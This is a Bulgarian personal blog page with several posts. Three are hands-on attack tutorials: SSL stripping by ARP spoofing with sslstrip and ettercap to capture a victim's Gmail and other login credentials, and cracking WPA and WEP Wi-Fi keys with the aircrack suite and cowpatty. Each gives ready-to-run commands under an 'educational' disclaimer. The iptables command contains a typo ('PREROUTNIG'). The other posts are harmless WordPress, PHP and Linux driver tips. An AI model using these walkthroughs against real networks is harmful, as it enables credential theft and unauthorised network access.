SSL Hijacking- Видео демонстрация

Здравейте отново от мен Мартин Петров и както винаги тази видео демонстрация е създадена с учебна цел. Авторът не носи отговорност за потенциални щети нанесени от демонстрацията.

Сега ще ви демонстрирам как можете да подслушвате SSL връзки или SSL Hijachking чрез sslstrip от Moxie Marlinspike.

Преди всичко трябва да сканираме своята мрежа и да си изберем потребител на които ще подслушваме SSL връзката.
Отваряме терминал едно и сканираме нашата мрежа

Избираме потребител с IP адрес 192.168.1.100

Сега ще се подготвим за нашият SSL Hijacking като отварим терминал 1 и  редактираме /etc/etter.conf

Позволяваме форвардинг
echo 1 > /proc/sys/net/ipv4/ip_forward

Сега пренасочваме порт 80 към 10 000 с iptables

iptables -t nat -A PREROUTNIG -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

Сега изпълняваме arp спуфинг

arpspoof -i eth0 -t 192.168.1.100 192.168.1.1

В терминал две стартираме sslstrip с аргумент -a -k -f

sslstrip -a -k -f

И в терминал 3 стартираме ettercap за да видим резултата от всичко това :)

ettercap -T -q -i eth0

Хайде сега да наблюдаваме машината на потребителя

Сега потребителят ще отвори сайт с криптирана връзка HTTPS. Например gmail: https://mail.google.com

Въвежда примерно потребителско име и парола

Ще погледнем ettercap в нашата машина. Виждаме потребителското име и паролата които потребителя  въведе по- рано. Всичко се вижда в чист текст като се има впредвид, че връзката беше реализирана чрез https.

По същия начин могат да се прослушват и нормални връзки към страници работещи на 80-ти порт.

Сега потребителя ще отвори уеб сайта arenabg.com и ще въведе примерно потребителско име и парола
Отново виждаме потребителското име и парола.

Видео демонстрация SSL Hijacking:

1. Видео демонстрация качена във vbox
2. Видео демонстрация качена във youtube

VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)

Плъгин Auto edno23 за WordPress

Днес направих плъгин за WordPress които автоматично добавя вашата публикация във www.edno23.com . Идеята е с едно публикуване в WordPress да публикувате и в edno23 .

Плъгинът "Auto edno23" има страница за настройка където трябва да въведете вашето edno23 потребителско име и парола. От там можете да изберете с тик дали автоматично да се публикува публикацията в edno23 или само когато отметнете тикчето при самото добавяне от WordPress. Добавил съм и възможност да прави кратки връзки от рода "http://is.gd/5LREc"

Плъгинът може да бъде изтеглен от тук: Плъгин Auto edno23

От тук може да изтеглите директно сорса на плъгина-> Сорс на плъгин

PS: Използвал съм за основа auto tweeter които доста моднах :)

VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)

Разбиване на Wireless с WPA encoding

Здравейте отново с мен Мартин Петров. Предния път ви демонстрирах как се разбива Wireless с WEP, а сега ще ви обясня как се разбива Wireless с WPA/PSK.

За целта ще използваме live дистрибуцията BackTrack 4 и приложенията в нея .

След като сме заредили нашият BackTrack ще отворим терминал за да подготвим нашият мрежови интерфейс за работа в режим мониторинг

# iwconfig wlan0 mode monitoring

След като настроихме мрежовият ни интерфейс сега ще сканираме за wireless мрежа която да компрометираме с учебна цел

# airodump-ng wlan0

Понеже търсим wireless със WPA кодиране,а тук виждаме такъв прекратяваме с Контрол и C. Wireless мрежата която ще използваме ще бъде "mpetrov_net" на шести канал.

След като избрахме коя мрежа да използваме и видяхме, че тя работи на шести канал е време да пуснем в Терминал 2 airodump за да събирем информация за съответната мрежа.

# airodump-ng -w wpa -c 6 --bssid 00:23:CD:D7:84:FC wlan0

Сега ще отворим Терминал 3 за да изпратим пакети за ре- оторизация. Ще трябва да използваме MAC адреса на клиента които можем да вземем от Терминал 1.

# aireplay-ng -0 1 -a 00:23:CD:D7:84:FC -c 00:1A:73:87:B4:E9 wlan0

След това ще погледнем Терминал 2 и ще видим горе в дясно WPA handshake: 00:23:CD:D7:84:FC с което приключваме събирането на пакети и пристъпваме към кракване на паролата.

За кракване на паролата ще използваме два метода единият е, чрез aircrack, а другият , чрез cowpatty

Първо ще реализираме кракване с aircrack

cd /pentest/wireless/aircrack-g/test
aircrack-ng -w password.lst /root/wpa-01.cap

Сега ще направим кракване с cowpatty:

cd /pentest/wireless/cowpatty
./cowpatty -r /root/wpa-01.cap -f dict -s mpetrov_net

И двата метода успяват да кракнат паролата и да я изведат.

Видео демонстрация от youtube.com: Разбиване на Wireless с WPA encoding (youtube)
Видео демонстрация от vbox7.com:
Разбиване на Wireless с WPA encoding (vbox7)
Надявам се, че този видео материал ще бъде използван и интерпретиран единствено с учебна цел.

До скоро от mpetrov.net

PS: Това е истината-> EPRB

Според нашия Наказателен Кодекс манипулирането на wireless мрежи е незаконно:

Чл. 212а. (Нов -- ДВ, бр. 92 от 2002 г.) (1) (Изм. -- ДВ, бр. 38 от 2007 г.) Който с цел да набави за себе си или за другиго облага възбуди или поддържа заблуждение у някого, като внесе, измени, изтрие или заличи компютърни данни или използва чужд електронен подпис и с това причини на него или на другиго вреда, се наказва за компютърна измама с лишаване от свобода от една до шест години и глоба до шест хиляди лева.
(2) (Изм. -- ДВ, бр. 38 от 2007 г.) Същото наказание се налага и на този, който, без да има право, внесе, измени, изтрие или заличи компютърни данни, за да получи нещо, което не му се следва.

Вместо да правите такива гимнастики проосто си платете интернета и ще го имате винаги.

VN:F [1.9.22_1171]
Rating: 5.0/5 (5 votes cast)
VN:F [1.9.22_1171]
Rating: +3 (from 3 votes)

Разбиване на Wireless с WEP encoding

Тук ще демонстрирам как се декодира ключ от wireless мрежа с кодиране WEP. Правя този видео материал защото много отдавна очаквах някои да сподели тази демонстрация в нашето българско интернет пространство, но уви никои не го направи.

Тук ще опиша как можем да вземем ключа на wireless мрежа с WEP кодиране.

За целта ще използваме live дистрибуцията BackTrack 4 и приложенията в нея ifconfig,iwconfig,airodump, aireplay и aircrack.

След като сме заредили нашият BackTrack ще отворим терминал за да подготвим нашият мрежови интерфейс за работа в режим мониторинг

# iwconfig wlan0 mode monitoring;

След като настроихме мрежовият ни интерфейс сега ще сканираме за wireless мрежа която да компрометираме с учебна цел

# airodump-ng wlan0

Понеже търсим wireless със WEP кодиране,а тук виждаме такъв прекратяваме с Контрол и C. Wireless мрежата която ще използваме ще бъде "mpetrov_net" на шести канал.

След като избрахме коя мрежа да използваме и видяхме, че тя работи на шести канал е време да пуснем airodump за да събирем информация за съответната мрежа.

# airodump-ng -w wep -c 6 --bssid 00:23:CD:D7:84:FC wlan0 (postoqnno raboti)

Сега ще отворим още един терминал в които ще използваме ARP Reply attack за да увеличим броя на дейта пакетите и да вземем инициализиращите вектори или IV на избраният по- рано Access Point.

# aireplay-ng -3 -b 00:23:CD:D7:84:FC wlan0

Оставяме aireplay пуснат и наблюдаваме Терминал 1. За да имаме успеваемост на разбиване на ключа е необходимо да съберем над 20 000 дейта пакети, след което ще прекратим airodump-ng и aireplay-ng.

След като събрахме над 22 000 дейта пакети прекратяваме airodump с Контрол и C и aireplay с Контрол и C

Сега имаме всичко необходимо за да декодираме ключа на wireless мрежата "mpetrov_net" като използваме aircrack за целта.

aircrack-ng wep-03.cap

Тук виждаме, че ключът е 9781238761 и е кракнат със 100% успеваемост.

Надявам се, че този видео материал ще бъде използван и интерпретиран единствено с учебна цел.

Видео материал във vbox7.com: Разбиване на Wireless с encoding Wep
Видео материал във youtube.com: Разбиване на Wireless с encoding Wep

Според нашия Наказателен Кодекс манипулирането на wireless мрежи е незаконно:

Чл. 212а. (Нов -- ДВ, бр. 92 от 2002 г.) (1) (Изм. -- ДВ, бр. 38 от 2007 г.) Който с цел да набави за себе си или за другиго облага възбуди или поддържа заблуждение у някого, като внесе, измени, изтрие или заличи компютърни данни или използва чужд електронен подпис и с това причини на него или на другиго вреда, се наказва за компютърна измама с лишаване от свобода от една до шест години и глоба до шест хиляди лева.
(2) (Изм. -- ДВ, бр. 38 от 2007 г.) Същото наказание се налага и на този, който, без да има право, внесе, измени, изтрие или заличи компютърни данни, за да получи нещо, което не му се следва.

Вместо да правите такива гимнастики проосто си платете интернета и ще го имате винаги.

VN:F [1.9.22_1171]
Rating: 5.0/5 (3 votes cast)
VN:F [1.9.22_1171]
Rating: +2 (from 2 votes)

Linux модул за TP-LINK TL-WN321G

Идеята на този пост е да обясни на начинаещите как да ползват своя wireless usb tplink wn321g под Linux. Модула за TP-LINK TL-WN321G е : rt73usb

За да го заредите изпълнете: modprobe rt73usb

За да видите дали е зареден правилно се изпълнява: iwconfig :)

VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)

Полезни неща за писачите на WordPress плъгини

Преди малко трябваше да напиша на бързо един прост плъгин за WordPress които да изпраща съдържанието на публикацията и линка към нея в един приятелски сайт. След като го направих реших да напиша по- важните неща от него:

1. Извеждане на съдържание на публикацията:
$_POST['post_content']

2. Извеждане на заглавието на публикацията:
$_POST['post_title']

3. Извеждане на линк на публикацията:
global $post_ID;
get_permalink($post_ID);

4. Добавяне на действие при публикуване:
add_action('publish_post', 'submit_friend_site');

VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)

Как да проверя какъв е моят IP Address

Наложи ми се да пусна една малка уеб тулка която да ми показва публичният IP адрес и понеже е супер лесна за реализация реших да направя и допълнение което да извежда информация за браузъра на потребителя. Ето връзка и към тази тулка: Как да проверява какъв е моят IP Address

VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)

Как да проверя какъв е моят IP Address

Наложи ми се да пусна една малка уеб тулка която да ми показва публичният IP адрес и понеже е супер лесна за реализация реших да направя и допълнение което да извежда информация за браузъра на потребителя. Ето връзка и към тази тулка: Как да проверява какъв е моят IP Address

VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)

Нов ред (на Windows) в PHP

За да се направи нов ред в php(при echo примерно) като на Windows трябва да се използва не само "\n" за нов ред, а комбинацията от "\r\n" т.е.

Пример за нов ред в php като на Windows:

echo "Martin\r\nPetrov\r\n";

VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)

Личен Блог на Мартин Петров